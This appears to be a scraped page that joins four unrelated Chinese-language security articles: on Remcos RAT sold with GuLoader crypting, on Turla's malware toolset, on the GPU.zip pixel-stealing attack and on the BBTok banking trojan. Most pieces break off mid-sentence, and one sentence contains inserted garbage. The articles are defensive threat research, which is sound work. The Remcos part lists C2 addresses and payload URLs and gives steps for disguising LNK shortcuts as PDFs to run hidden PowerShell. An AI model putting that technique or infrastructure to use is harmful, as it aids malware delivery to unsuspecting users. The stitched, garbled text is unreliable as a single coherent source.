Remcos是一款著名的遠程監控工具，其營銷目的是為了合法的跟踪和監控。自2016年出現以來，研究人員一直在許多網絡釣魚活動中監測Remcos，除了典型的遠程管理工具功能外，Remcos還包括一些不常見的功能，如中間人(MITM)功能、密碼竊取、跟踪瀏覽器歷史記錄、竊取cookie、密鑰記錄和網絡攝像頭控制。這些功能超出了RAT的典型範圍。 在黑客論壇上的CloudEyE廣告消失後，研究人員開始在互聯網上尋找有關CloudEyE Protector的信息。在谷歌搜索結果的第一頁，研究人員發現了一個Utopia項目網站的鏈接，其中CloudEyE Protector被列在“商家”部分，就在BreakingSecurity (Remcos RAT的官方網站)之後： BreakingSecurity和CloudEyE在Utopia網站上的廣告 研究人員還注意到，在2022-2023年，Remcos樣本的數量幾乎佔能夠識別惡意軟件家族的所有成功解密GuLoader有效負載的四分之一。 確定的GuLoader有效負載 換句話說，在過去的一年裡，Remcos已經成為使用GuLoader傳播的最常見的惡意軟件。如上所述，這不是巧合。 VGO TheProtect——GuLoader的新產品Remcos的營銷和銷售最初是在黑客論壇上進行的，後來在一個名為BreakingSecurity[.]net的專門網站上進行銷售。從2022年開始，人們可以在另一個名為VgoStore[.]net的網站上找到Remcos的銷售，VgoStore在@BreakingSecurity_Group Telegram群中被宣傳為Remcos的官方經銷商，該組織由暱稱為“EMINэM”的版主(用戶名@breakindsecurity， @emin3m， @Break1ngSecurir1ty)運營： “EMINэM”在BreakingSecurity Telegram群發布的VgoStore廣告 在VgoStore，除了breakingsecurity的Remcos，你還可以找到一個完整的惡意傳播包和初始訪問工具包，如“Excel 和Doc 漏洞”，LNK漏洞，RDP帳戶，專用DNS，加密器等。這些工具被標記為“教育”。 在這些工具中，研究人員注意到了TheProtect(Private Protect服務)： 除了@BreakingSecurity_Group Telegram群之外，“EMINэM”還為VgoStore維護了一個名為@VgoStore_Group的Telegram群。在這些群中，每當用戶要求提供加密服務時，“EMINэM”和另一位管理員“VGO”就會推送TheProtect，同樣值得注意的是，在一條消息中，“EMINэM”提到TheProtect是一個幫助Remcos繞過Windows Defender (WD)的工具： TheProtect在BreakingSecurity和VgoStore Telegram群中的廣告 與此同時，在BreakingSecurity Telegram群中，管理員似乎試圖與惡意活動保持距離，稱他們只提供了一種將Remcos列入殺毒白名單的方法，而不是繞過保護。與VgoStore群相反，在VgoStore群中，TheProtect被宣傳為提供“運行時FUD”的服務，即在執行樣本時完全無法被殺毒軟件檢測到： VGO和“EMINэM”在BreakingSecurity和VgoStore Telegram群中發布的消息 TheProtect有兩種保護方式：Private Protect和Script Protect。 protect保護方法 根據VgoStore官網顯示，Script Protect提供的文件為VBS文件，而不是EXE文件。 “Private Protect”一詞可能具有誤導性，因為它可能給人一種印象，即每個客戶都收到了一個獨特的工具。然而，在進一步檢查VgoStore的Telegram群和YouTube頻道中的視頻後，很明顯有兩種類型的加密服務可用：一種基於NSIS (Nullsoft Scriptable Install System)，另一種基於VBS (Visual Basic Scripting)。 研究人員懷疑這與最常見的GuLoader變體相似，其中一個是VBS變體，另一個是NSIS變體。 Script Protect是非常昂貴的，在30天內，4個受保護文件的售價為7000美元，對於Script Protect和Private Protect，他們都聲明“研究人員保留最多3天的時間來提供受保護的軟件。”這讓研究人員認為保護過程並不是完全自動化的，這意味著購買者可能不會收到自動生成受保護文件的構建器，就像CloudEyE的情況一樣。 Protect VBS變體正如研究人員之前所寫的，VgoStore會在Telegram群@VgoStore_Group發布產品更新，客戶可以獲得支持。在這個群組中，管理員經常發布演示其產品功能的視頻。 VgoStore Telegram群 在該組織於2023年3月5日發布的一個視頻中，用戶@VgoStore演示了使用偽裝成PDF的LNK文件進行攻擊。 在VgoStore Telegram群中發布的視頻 在這個視頻中，研究人員看到點擊LNK文件會導致新的進程“eilowutil.exe”啟動一個與遠程服務器“84.21.172.49：1040”的TCP連接。在啟動LNK文件之前，視頻顯示所有Windows Defender功能都已啟用，並且Windows Defender在整個執行過程中沒有引發任何警報。 視頻提供了被測試樣本的重要細節，使研究人員能夠恢復完整的攻擊鏈。在01：13處，研究人員可以簡單看到process Hacker顯示的powershell.exe進程的命令行，這使研究人員能夠識別本視頻中演示的樣本(SHA256：c914dab00f2b1d63c50eb217eeb29bcd5fe20b4e61538b0d9d052ff1b746fd73)，並使用行為搜索查詢在VirusTotal上找到它： 視頻中演示的進程命令行使研究人員能夠在VirusTotal上找到一個相關的樣本 當研究人員下載腳本時，研究人員發現它類似於研究人員在文章《基于云的恶意软件传播：GuLoader的演变》 中描述的GuLoader的VBS變體。與研究人員在上一篇文章中描述的版本的唯一區別是，shellcode以base64編碼的形式嵌入VBScript中，然後放入註冊表中： 存儲在註冊表中的base64編碼加密數據 VBScript的另一部分包含有兩層混淆的PowerShell腳本。該腳本包含在視頻截圖中觀察到的字符串，用於識別此惡意樣本($Tjringernes=， Diu;DyrFAttuEncnNatcWootLobiLsioReknUnd)： 部分VBS包含混淆的PowerShell腳本 在去混淆之後，研究人員得到了以下代碼： 去混淆PowerShell腳本 這段代碼從註冊表加載base64編碼的數據，使用CallWindowProcA API函數解碼並運行它，方法與基於《云的恶意软件传播：GuLoader的演变》 中描述的相同。該代碼的前645個字節沒有被加密，並且包含解密器的代碼，其餘的數據包含加密的shellcode。 研究人員用於自動分析惡意樣本的工具將加密數據識別為GuLoader，並成功解密shellcode，包括GuLoader配置、下載有效負載的URL和有效負載解密密鑰： 解密後的GuLoader配置 截止發文，URL“hxxp：//194[.180.48.211/nini/EAbsGhbSQL10. html”“Aca”仍然活躍。因此，研究人員能夠下載最終的有效負載(SHA256 7bd663ea34e358050986bde528612039f476f3b315ee169c79359177a8d01e03)，他們使用從GuLoader shellcode中提取的密鑰來解密它。解密後的樣本似乎是Remcos RAT（SHA256 25c45221a9475246e20845430bdd63b513a9a9a73ed447bd7935ff9ecee5a61e）。 GuLoader攻擊鏈的恢復部分 研究人員從這個Remcos樣本中提取並解密了CC配置，發現它包含一個CC服務器的地址“84.21.172.49:1040”： 解密後的Remcos CC配置 最後，使用最初找到的GuLoader VBS樣本“Leekish.VBS”的“VirusTotal Relations”選項卡，研究人員還發現了下載該文件的URL：“hxxp://194.180.48.211/nini/Leekish.vbs”。這個地址也在視頻中被披露： 下載在VirusTotal上找到的初始VBS樣本的URL 視頻（第00:45幀）中展示的另一個有趣的社會工程技巧是操縱LNK文件，攻擊者誤導用戶相信它是PDF文檔。即使用戶懸停在LNK文件上，工具提示也會顯示“Type: PDF Document”；此外，如果用戶雙擊LNK文件，它實際上會打開一個誘餌PDF文件，而惡意進程會在後台靜默運行。 這是通過以下簡單步驟實現的： 1.文件擴展名更改為“.pdf.lnk”，利用默認情況下隱藏的文件擴展名。 2.LNK描述被修改為顯示“PDF文檔”，利用了Windows顯示快捷方式描述字段內容的事實。請注意，工具提示中顯示的大小與實際文件大小不同。工具提示顯示“Size: 7.11Kb”，取自快捷方式的Description字段，而文件大小實際上是3Kb。 3.圖標源已更改為顯示PDF圖標。 4.LNK文件還下載並執行一個誘餌PDF文件。 偽裝成PDF文檔的LNK文件 研究人員在VirusTotal上發現了一個LNK文件(SHA256：63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8)，該文件引用了上述URL，並包含完全相同的Description字段： 解析後的LNK文件 此惡意快捷方式文件利用Windows System32文件夾中存在的合法腳本SyncAppvPublishingServer.vbs的功能來運行任意PowerShell命令。命令行參數包含用於下載和運行惡意腳本“Leekish.vbs”和PDF誘餌的PowerShell命令，msedge.exe文件中的PDF圖標用作快捷方式圖標。 因此，研究人員已經恢復了視頻中展示的完整攻擊鏈，並確定了大部分涉及的文件和組件。視頻中提到的“Script Protect文件”似乎是Remcos RAT，其CC服務器位於“84.21.172.48:1040”。研究人員將保護程序確定為GuLoader的VBS版本： VgoStore Telegram群視頻中顯示的完整攻擊鏈 這個攻擊鏈類似於研究人員從GuLoader之前的攻擊中看到的，RedCanary博客中也有描述，這個VBS和LNK樣本特別有趣，因為研究人員在去年(2023年2月)發現了針對註冊會計師和會計師的攻擊。 保護NSIS變體VgoStore還有一個YouTube頻道。 2023年4月12日發布的視頻“Lnk Exploit”與研究人員上面分析的視頻非常相似。演示者下載一個包含LNK文件的文檔並運行此LNK文件。如視頻所示，同時安裝了所有最新的Windows更新，並啟用了安全功能。與前面的情況一樣，如果研究人員在2分11秒處暫停視頻，就可以看到由於運行LNK文件而創建的powershell.exe進程的命令行。 包含URL的命令行 上面屏幕截圖中的process命令行包含2個URL，截至發文時，這兩個URL都是活動的，這使研究人員能夠下載這些文件。 其中一個示例是一個誘餌PDF，第二個示例是NSIS安裝程序包

Turla（又名Pensive Ursa、Uroburos、Snake）是一個至少從2004年開始運行，總部位於俄羅斯的一個攻擊組織。該組織與俄羅斯聯邦安全局（FSB）有一定聯繫。接下來，我們將在這篇文章中介紹Pensive Ursa工具庫中最近活躍的10種惡意軟件：Capibar、Kazuar、Snake、Kopiluak、QUIETCANARY/Tunnus、Crutch、ComRAT、Carbon、HyperStack和TinyTurla。 MITRE ATTCK稱Turla是以其有針對性的攻擊和隱身而聞名，多年來，Pensive Ursa已經成為一個先進而難以被發現的惡意軟件。 正如MITRE所描述的那樣，Pensive Ursa已對至少45個國家發起過攻擊，包括政府實體、大使館和軍事組織，以及教育、研究和製藥公司。此外，該組織還參與了2022年2月開始的俄烏衝突。據烏克蘭CERT稱，Pensive Ursa利用間諜攻擊烏克蘭目標，特別是針對其國防部門。 雖然Pensive Ursa主要利用他們的間諜工具瞄準Windows設備，但也會攻擊macOS和Linux設備。 以下是該團隊工具庫中最活躍的10種惡意軟件。對於每種類型的惡意軟件，我們都提供了簡短的描述和分析，以及Cortex XDR如何檢測和阻止攻擊。 Capibar別名：DeliveryCheck、GAMEDAY； 惡意軟件類型：後門； 首次發現時間：2022年； Capibar（又名DeliveryCheck，GAMEDAY）是Pensive Ursa後門，於2022年首次被觀察到，主要用於對烏克蘭國防軍進行間諜活動，通過電子郵件將其作為帶有惡意宏的文檔傳播。 Capibar通過下載並在內存中啟動負載的計劃任務而马云惹不起马云持續存在。攻擊組織將Capibar作為託管對象格式（MOF）文件安裝在受攻擊的MS Exchange服務器上，使攻擊者能夠完全控制服務器。 下圖顯示了負責加載從其命令和控制（C2）接收的XML的代碼片段，圖2顯示了觸發的警報： Capibar代碼段加載從其C2接收的XML Cortex XDR觸發了警報 Kazuar惡意軟件類型：後門； 首次發現時間：2017年 Kazuar是.NET後門，於2017年被首次發現。 Kazuar提供對其操作人員所針對的受感染系統的全面訪問權限，Kazuar附帶了一個強大的命令集，包括遠程加載額外插件，以增強後門功能的能力。 2021年，研究人員發現，Kazuar和俄羅斯攻擊組織在SolarWinds行動中使用的SUNBURST後門之間存在有趣的代碼重疊和相似之處。 2023年7月，烏克蘭CERT破獲了一次間諜行動，Pensive Ursa則是將Kazuar作為主要後門之一。 下圖顯示了Cortex XDR阻止將Kazuar DLL注入explorer.exe進程，下圖顯示為防止Kazuar而觸發的警報： Kazuar被注入explorer.exe並被Cortex XDR阻止 Cortex XDR的Kazuar執行阻止警報 Snake惡意軟件類型：模塊化後門； 首次被發現時間：2003年； 正如CISA在2023年5月描述的那樣，臭名昭著的Snake惡意軟件是Pensive Ursa工具集中最複雜的工具。該工具的主要目的是實現相當長一段時間的持久性，並從專用目標中盜取數據。自2003年以來，它已經發展了20年。 Snake在全球50多個國家被發現，美國司法部發表聲明，宣布了MEDUSA行動。在該行動中，他們查獲了Snake惡意軟件活動和P2P網絡。他們使用了聯邦調查局開發的一種名為PERSEUS的工具，將其用作Snake惡意軟件的阻止攻擊。 基於先前的分析，Snake惡意軟件實現了可維護的代碼設計，這表明其開發者俱有較高的軟件開發功能。 Snake實現了以下功能： 基於HTTP和TCP的通信協議的自定義實現； 用於隱身的內核模塊； 按鍵記錄儀功能； Snake最近的變種包括一個類似於下面描述的感染鏈。 Snake惡意軟件傳播示例執行時，Snake從其資源中加載並執行Pensive Ursa的PNG Dropper惡意軟件，並創建一個硬編碼互斥體{E9B1E207-B513-4cfc-86BE-6D6004E5CB9C，如下圖所示： Snake loader的資源 然後，PNG釋放器解碼並加載一個易受攻擊的VM驅動程序，該驅動程序用於權限提升，以便將主Snake負載寫入磁盤，並將其註冊為服務。下圖所示的Snake加載程序變體檢測感染鏈中的多個階段，這些階段導致部署、服務註冊和執行Snake主負載。 下圖顯示了Cortex XDR中彈出的執行阻止警報： 檢測模式下Cortex XDR中顯示的Snake執行檢測 Cortex XDR中顯示的Snake執行阻止警報 QUIETCANARY別名：Tunnus； 惡意軟件類型：後門； 首次發現時間：2017； 自2019年以來，人們一直在使用QUIETCANRY觀察Pensive Ursa，Tomiris組織甚至更早地使用了這個後門。 Pensive Ursa於2022年9月便針對烏克蘭的目標部署了QUIETCANARY，以及Kopiluwak惡意軟件。 QUIETCANRY是一個用.NET編寫的輕量級後門，能夠執行從其C2服務器接收的各種命令，包括下載額外的有效負載和執行任意命令。它還實現了RC4加密，以保護其C2通信。 下圖顯示了QUIETCANRY後門功能的不同類，展示了QUIETCANRY觸發的基於Cortex XDR多層保護的警報： QUIETCANRY代碼中不同類的代碼段 下圖顯示了執行阻止警報： 在Cortex XDR中顯示了QUIETCANRY的警報 Cortex XDR中顯示的QUIETCANARY/Tunnus執行阻止警報 Kopiluwak惡意軟件類型：傳播器/下載器； 首次發現時間：2016年； Kopiluwak惡意軟件於2016年底被首次發現，它是由各種類型的滴管作為多層JavaScript而進行有效負載傳播的。 Pensive Ursa在2017年的一次G20主題攻勢中使用MSIL滴管釋放了Kopiluak惡意軟件，並在2022年末作為SFX可執行文件釋放。 Kopiluwak的JavaScript文件如下圖所示，下面是C:\Windows\Temp\ path下的代碼片段。其目的是收集有關受攻擊計算機的有價值的初始分析信息，例如： 在目標位置列出文件； 檢索當前運行的進程； 顯示活動的網絡連接； 攻擊者通過運行systeminfo、tasklist、net、ipconfig和dir等偵察命令來完成此活動，結果保存在名為result2.dat的文件中。 在檢測模式下，在Cortex XDR中顯示Kopiluwak執行檢測 下圖列出了由Kopiluwak執行，並由Cortex XDR檢測到的偵察命令： Kopiluwak的偵察命令 下圖顯示了Cortex XDR為Kopiluwak發出執行阻止警報： Cortex XDR中顯示的Kopiluak執行阻止警報 2019年，Pensive Ursa開始使用Topinambour滴管遞送Kopiluak。該組織將Topinambour捆綁到一個合法的軟件安裝程序中。 安裝後，Topinambour作為一個小的.NET文件被放到%localappdata%文件夾中，並作為一個計劃任務寫入。然後，該惡意軟件與其硬編碼的C2虛擬專用服務器（VPS）通信，以傳遞Kopiluwak惡意軟件。 Cortex XDR在檢測模式下顯示Topinambour執行檢測 下圖顯示了Cortex XDR彈出的阻止警報： Cortex XDR中顯示的Topinambour執行阻止警報 Crutch惡意軟件類型：後門； 首次發現時間：2015年； 2020年12月，ESET研究人員發現了Crutch後門。根據Pensive Ursa的戰術、技術和程序（TTP），攻擊者利用後門攻擊了歐洲的幾個目標，包括一個歐盟成員國的外交部。 這個後門的主要目的是竊取敏感文件，並將數據洩露到Pensive Ursa運營商控制的Dropbox帳戶。使用Dropbox等商業服務進行C2通信是一種已知的（但有效的）技術，因為它是一種合法的服務，並與其他網絡通信相融合。 由於代碼和TTP與Pensive Ursa的另一個名為Gazer的後門有很大的相似性，Crutch被認為是第二階段的後門，其持久性是通過DLL劫持實現的。 下圖顯示了Cortex XDR中Crutch的檢測和阻止： ComRAT別名：Agent.btz； 惡意軟件類型：後門； 首次出現時間：2007年 PowerShell滴管在檢測模式下將ComRAT釋放到Cortex XDR中顯示的磁盤 ComRAT是Pensive Ursa最古老的後門之一，他們在惡意軟件的早期迭代中將其命名為Agent.btz。 據報導，ComRAT於2007年首次被發現。從那時起，它進行了多次升級，截至2020年，ComRAT已經迭代了4版。此攻擊是在C++中開發的，攻擊者已使用PowerShell植入（如PowerStalion）進行部署。 下圖顯示了PowerShell滴管機制。攻擊者在使用ComRAT時的主要目的是從高價值目標那裡竊取和洩露機密文件： Cortex XDR中顯示ComRAT PowerShell滴管執行阻止警報 下圖描述了Cortex XDR中的PowerShell和DLL執行阻止： Cortex XDR中顯示的ComRAT DLL執行阻止警報 Carbon惡意軟件類型：後門； 首次發現時間：2014年 Carbon是一個模塊化後門框架，Pensive Ursa已經使用了幾年。 Carbon框架包括一個安裝程序、一個協調器組件、一個通信模塊和一個配置文件。 Carbon還具有P2P通信功能，攻擊者使用該功能向受網絡上影響的其他受感染設備發送命令。 Carbon通過使用Pastebin等合法網絡服務提供商接收C2的命令。 下圖顯示了Carbon在Cortex XDR中的執行檢測和阻止： Carbon創建了一個加載附加組件的服務，該服務在檢測模式下顯示在Cortex XDR中 Cortex XDR中顯示的Carbon執行阻止警報 HyperStack惡意軟件類型：後門； 首次亮相：2018年； HyperStack（又名SilentMo，BigBoss）是一個RPC後門，於2018年首次被發現，攻擊者在針對歐洲政府實體的行動中使用了它。 HyperStack使用一個控制器進行操作，該控制器使用命名管道通過RPC與受HyperStack感染的受攻擊環境中的其他計算機進行通信。此通信方法使攻擊者能夠控製本地網絡上的計算機。 HyperStack顯示了與Pensive Ursa的Carbon後門的幾個相似之處，如加密方案、配置文件格式和日誌記錄約定。 下圖顯示了HyperStack在Cortex XDR中的檢測和阻止： HyperStack創建了一個用於持久性的服務，在檢測模式下顯示在Cortex XDR中 Cortex XDR中顯示HyperStack執行阻止警報 TinyTurla惡意軟件類型：後門； 首次發現時間：2021年； TinyTurla惡意軟件於2021年被Talos首次發現，他們認為這是第二階段的後門。美國、歐盟和後來的亞洲目標都發現了這種後門。 TinyTurla的主要功能包括： 下載其他有效負載； 向攻擊者的C2服務器上傳文件； 執行其他進程； 如下圖所示，攻擊者通過批處理腳本將後門安裝為名為WindowsTimeService的服務。批處理腳本還負責將C2服務器的數據寫入註冊表。一旦後門被執行，它讀取這些值將與其C2通信。 它偽裝成一個名為w64time.DLL的DLL，位於system32文件夾下。 上面描述的批處理腳本的內容 雖然w32time.dll是一個合法的DLL，而且其他合法的DLL確實有32位和64位的變體，但是合法的w64time.dll並不存在。這種命名慣例旨在進一步分散受害者的注意力，使他們不產生懷疑。 下圖顯示了Cortex XDR檢測批處理腳本、W64Time服務和TinyTurla DLL執行的編寫和執行： Cortex XDR在檢測模式下顯示TinyTurla阻止 Cortex XDR中顯示TinyTurla執行阻止警報 戰術、技術和程序(TTP)Cortex XDR警報被映射到MITRE ATTCK框架，並提供與攻擊相關的戰術和技術信息，如下圖所示： Cortex XDR的Mitre ATTCK映射 Pensive Ursa相關活動和工具庫在Cortex XDR中引發了多個警報，這些警報被映射到表1中引用的MITRE ATTCK戰術和技術。 MITRE ATTCK戰術和技術 總結眾所周知，Pensive Ursa高級持續攻擊（APT）組織是一個重要且持續存在的攻擊組織。憑藉其先進的技術，其運營組織在針對全球行業的同時，也向大眾展示了一種先進的規避方式。 我們在本文探索了Pensive Ursa工具庫中排名前十的惡意軟件，並通過Palo Alto Networks Cortex XDR監測了其執行過程。這表明針對先進攻擊使用多層保護模式的重要性。 因為Pensive Ursa APT攻擊的受害者可能會造成重大損失，其後果不僅限於財務損失和數據洩露，還包括影響關鍵基礎設施的可能性，這可能會對國家安全和地緣政治產生影響。因此，每個組織，無論其規模或行業如何，都必須優先考慮全面的安全戰略，並投資多層安全措施，以防範Pensive Ursa等APT組織日益增長的攻擊。 保護和緩解措施Palo Alto Networks Cortex X

四所美國大學的研究人員在周二發表的一篇論文中演示表明，六家主要供應商的GPU都容易受到一種新發現的攻擊，這種攻擊讓惡意網站可以讀取其他網站顯示的用戶名、密碼及其他敏感的可視化數據。 跨源攻擊允許來自一個域（比如example.com）的惡意網站有效地讀取來自example.org或另一個不同域的網站顯示的像素，然後，攻擊者可以重新構建像素，讓他們可以查看後一個網站顯示的單詞或圖像。這種洩漏違反了一個關鍵的安全原則，該原則構成了保護互聯網的最基本的安全邊界之一，這個原則就叫同源策略（same origin policy），它要求託管在一個網站域上的內容與所有其他網站域隔離開來。 優化帶寬是有代價的GPU.zip（這種概念驗證攻擊的名稱）始於一個惡意網站，該網站將一個指向它想要讀取的某個網頁的鏈接放在iframe中，而iframe是一種常見的HTML元素，允許網站嵌入廣告、圖像或託管在其他網站上的其他內容。通常情況下，同源策略會阻止任何一個網站查看另一個網站的源代碼、內容或最終的可視化產品。研究人員發現，內部GPU和獨立GPU都用來提高性能的數據壓縮充當了側信道，他們可以濫用這條側信道繞過限制，逐個竊取像素。 GPU.zip若要奏效，必須將惡意頁面加載到Chrome或Edge瀏覽器中。當這些瀏覽器處理攻擊頁面時，Firefox和Safari在工作方式方面的底層差異阻止攻擊得逞；另一個要求是，在iframe中鏈接的頁面不能被配置為拒絕被跨源網站嵌入。 當HTML被嵌入到惡意網站上的iframe中時，可能導致安全威脅，這是十多年來公開的秘密。大多數網站通過X-Frame-Options或Content-Security-Policy標頭限制跨源嵌入顯示用戶名、密碼及其他敏感內容的頁面，然而並非所有網站都這麼做。維基百科就是一個例子，它顯示賬戶登錄者的用戶名，如果一個人在訪問一個他不信任的網站時想要保持匿名，而如果該網站包含的iframe含有指向https://en.wikipedia.org/wiki/Main_Page的鏈接，可能會被拒絕。 圖1. 對用戶去匿名化處理的像素竊取概念驗證（PoC），運行時打開的其他標籤播放視頻。 “Ground Truth”是受害者iframe（以“Yingchenw”登錄維基百科）。 “AMD”是在Ryzen 7 4800U上30分鐘後的攻擊結果，準確率為97%。 “Intel”是在i7-8700上215分鐘後的攻擊結果，準確率高達98%。 研究人員表明了GPU.zip如何允許他們為PoC創建的一個惡意網站逐個竊取用戶維基百科用戶名的像素。攻擊適用於蘋果、英特爾、AMD、高通、Arm和英偉達提供的GPU。在AMD的Ryzen 7 4800U上，GPU.zip花了約30分鐘來渲染目標像素，準確率達到了97%，在運行英特爾i7-8700的系統上顯示時，攻擊需要215分鐘才能重建像素。 研究人員分析的所有GPU都使用專有的壓縮形式來優化PC、手機或顯示目標內容的其他設備的內存數據總線中的可用帶寬。壓縮方案因廠商而異，沒有文檔記錄，因此研究人員對每種壓縮方案進行了逆向工程處理，從而獲得的一種方法使用SVG（可縮放矢量圖形）圖像格式，在存在壓縮的情況下最大化黑白目標像素之間的DRAM流量差異。雖然論文討論了GPU.zip，因為它適用於iGPU或內部GPU，但這種技術同樣適用於獨立或離散GPU。 研究人員在論文中寫道：我們演示了攻擊者可以利用基於iGPU的壓縮信道，在使用SVG過濾器的瀏覽器（截至2023年4月的最新版Google Chrome）中執行跨源像素竊取攻擊，即使SVG過濾器是在恆定時間實施的。原因在於，攻擊者可以根據瀏覽器中的單個秘密像素，創建高度冗餘或高度非冗餘的模式，由於這些模式由iGPU處理，它們不同程度的冗餘導致無損壓縮輸出依賴秘密像素，依賴數據的壓縮輸出直接轉換為依賴數據的DRAM流量和依賴數據的緩存佔用。 因此我們表明，即使在最被動的威脅模型下（攻擊者只能使用瀏覽器中的粗粒度計時器觀察模式的粗粒度冗餘信息，並且缺乏自適應選擇輸入的能力），單個像素也可能被洩露。我們的概念驗證攻擊在一系列設備（包括電腦和手機）上得逞，這些設備來自眾多硬件廠商，採用不同的GPU架構（英特爾、AMD、蘋果和英偉達）。令人驚訝的是，我們的攻擊在離散GPU上也得逞了，我們的初步結果表明這些架構上還存在軟件透明壓縮。 現在是個威脅？可能不是，但是……數據壓縮是提高軟硬件性能的一項常見特性。它使用複雜運算來表示文件或數據塊中的冗餘，並縮減其擁有的位數，壓縮也是一種常見的側信道，成為過去十年中幾次攻擊的原因，比如用於解密一些HTTPS流量的CRIME（壓縮比信息洩露變得容易）漏洞，針對HTTPS加密的另一種攻擊BREACH（全稱通過超文本自適應壓縮進行的瀏覽器偵察和洩露），2018年名為VORACLE的攻擊，以及在2021年針對存儲器壓縮的實用時序側信道攻擊。 如前所述，GPU.zip僅在惡意攻擊者網站被加載到Chrome或Edge中時有效。原因是：要使攻擊有效，瀏覽器必須： 1.允許跨源iframe與cookie一同被加載 2.允許在iframe上渲染SVG過濾器 3.將渲染任務委託給GPU 谷歌的代表沒有表明該公司是否計劃改變Chrome的行為以回應研究結果。 與此同時，英特爾的代表在一封電子郵件中表示，這家芯片製造商“評估了研究人員提供的發現結果，確定根本原因不在我們的GPU上，而在第三方軟件上。” 眼下，GPU.zip更多的是一種好奇而不是真正的威脅，但前提是Web開發人員適當地限制敏感頁面不被跨源網站嵌入。如果最終用戶想要檢查頁面是否實施了此類限制，應該查找源頭中的X-Frame-Options或Content-Security-Policy標頭。為此： 1.打開網頁 2.打開開發者控制台 3.重新加載網頁 4.進入到網絡標籤，檢查主文檔請求 5.查看X-Frame-Options或Content-Security-Policy是否在這裡被設置 檢查www.gmail.com可以看到X-Frame-Options被設置為SAMEORIGIN（同源）。 然而，檢查https://en.wikipedia.org/wiki/Main_Page卻發現沒有設置這樣的標頭。 明年5月在舊金山將舉行第45屆IEEE安全與隱私研討會，雖然GPU.zip目前構成的威脅很小，但研究和令人驚訝的發現對設計軟硬件的人來說仍然很重要。

Check Point Research研究人員最近在拉丁美洲發現了一個活躍活動，該活動正在操作和部署BBTok銀行軟件的新變體。在這項研究中，我們會介紹新發現的攻擊鏈，這些攻擊鏈使用了一種獨特的Living off the land Binaries組合，所以，儘管BBTok銀行軟件至少從2020年開始活躍，但時至今日，被檢測到的概率還是很低。在分析該活動時，研究人員發現了一些攻擊者在攻擊中使用的服務器端資源，目標是巴西和墨西哥的數百名用戶。 服務器端組件負責提供可能通過網絡釣魚鏈接傳播的惡意有效負載。我們已經觀察到相同的服務器端腳本和配置文件的多次迭代，這些腳本和配置文件展示了BBTok銀行軟件部署方法隨著時間的推移而演變的過程。這我們得以一窺攻擊者尚未實現的攻擊媒介，並追踪用於維持此類操作的源代碼的起源。 我們將在本文重點介紹用於傳播銀行軟件的有效負載服務器的一些服務器端功能，它們可以為每個受害者產生獨特的有效負載。 發現過程BBTok異常活躍，針對巴西和墨西哥的用戶，採用多層地理圍欄來確保受攻擊的設備僅來自這些國家。 自2020年BBTok最後一次公開報導以來，運營商的技術、戰術和程序(TTPs)發生了重大變化，增加了額外的混淆層和下載器，從而使檢測率降到最低。 BBTok銀行有一個專門的功能，可以復制40多家墨西哥和巴西銀行的界面，並欺騙受害者將其雙重身份驗證代碼輸入他們的銀行賬戶或輸入他們的支付卡號。 新識別的有效負載是由自定義服務器端應用程序生成的，該應用程序負責根據操作系統和位置為每個受害者生成唯一的有效負載。 對有效負載服務器端代碼的分析顯示，攻擊者正在積極維護不同版本Windows的多樣化攻擊鏈，這些鏈使用各種各樣的文件類型，包括ISO, ZIP, LNK, DOCX, JS和XLL。 攻擊者在他們的武器庫中添加開源代碼、來自黑客論壇的代碼和新的漏洞（例如Follina）。 BBTok銀行軟件歷史BBTok銀行軟件於2020年首次被披露，通過無文件攻擊部署在拉丁美洲。其功能非常齊全，包括枚舉和終止進程、鍵盤和鼠標控制以及操作剪貼板內容。除此之外，BBTok還包含經典的銀行木馬功能，模擬在墨西哥和巴西運營的各種銀行的虛假登錄頁面。 自從首次被公開披露以來，BBTok運營商已經採用了新的https，同時仍然主要利用帶有附件的網絡釣魚電子郵件進行初始攻擊。最近，我們看到了銀行軟件通過網絡釣魚鏈接傳播的跡象，而不是作為電子郵件本身的附件。 在訪問惡意鏈接時，會將ISO或ZIP文件下載到受害者的計算機上，這些文件包含一個啟動攻擊鏈的LNK文件，在打開一個誘餌文件的同時，導致銀行軟件的部署。雖然乍一看，這個過程似乎很簡單，但幕後操作非常複雜。 在分析這些新發現的鏈接時，研究人員發現了用於傳播惡意軟件的內部服務器端資源。很明顯，攻擊者保持了廣泛的攻擊鏈，每次點擊都根據需要生成，並根據受害者的操作系統和位置進行定制。 BBTok銀行攻擊BBTok為其運營商提供了廣泛的功能，從遠程命令到經典的銀行木馬功能，BBTok可以復制多家拉美銀行的界面。其代碼引用了墨西哥和巴西的40多家主要銀行，如花旗銀行、豐業銀行、Banco Itaú和匯豐銀行。銀行軟件通過遍歷打開的窗口和瀏覽器選項卡的名稱，搜索銀行名稱，來尋找受害者是這些銀行客戶的跡象。 其默認目標顯然是西班牙對外銀行(BBVA)，其默認的虛假界面旨在復制其外觀。這些虛假的界面冒充合法機構，誘使毫無戒心的用戶洩露個人和財務信息，該功能的重點是誘騙受害者輸入作為銀行賬戶密碼，並接管受害者的銀行賬戶。 嵌入BBTok 銀行軟件中的虛假接口示例 BBTok是用Delphi編寫的，它使用可視化組件庫(VCL)來創建表單，毫不誇張地說，這些表單形成了這些虛假的界面，這使得攻擊者可以動態、自然地生成適合受害者電腦屏幕的界面和受害者銀行的特定形式而不會引起懷疑。作為銀行軟件的默認目標銀行，西班牙對外銀行(BBVA)將其接口存儲在一個名為“TFRMBG”的表單中，除了銀行網站，攻擊者也開始在受攻擊的設備上搜索有關比特幣的信息，積極尋找”bitcoin”, ”Electrum”和”binance”等字符串。 除此之外，BBTok還可以安裝惡意瀏覽器擴展或註入名為“rpp.dll”的DLL來進一步控制受攻擊的系統，並可能提高其欺騙受害者的能力。 值得注意的是，該攻擊者採取了謹慎的方式所有的銀行活動都是在其C2服務器的直接命令下執行的，而不是在每個受攻擊的系統上自動執行。 負載服務器分析為了有效管理他們的活動，BBTok運營商創建了一個獨特的流程，由受害者點擊惡意鏈接啟動，該鏈接可能是通過釣魚電子郵件發送的。當受害者點擊鏈接時，會根據受害者的操作系統下載ZIP文件或ISO映像。這個過程對受害者來說是無感的，但服務器會根據請求中找到的參數生成唯一的有效負載。 BBTok攻擊中使用的服務器端組件 此過程在基於xampp的服務器上執行，包含三個基本組件： 一個PowerShell腳本，用於處理有效負載準備，並包含創建lure文檔的主要邏輯； 一個PHP代碼庫和數據庫，用於記錄和管理攻擊； 增強這些組件功能的輔助實用程序。 具體流程如下： 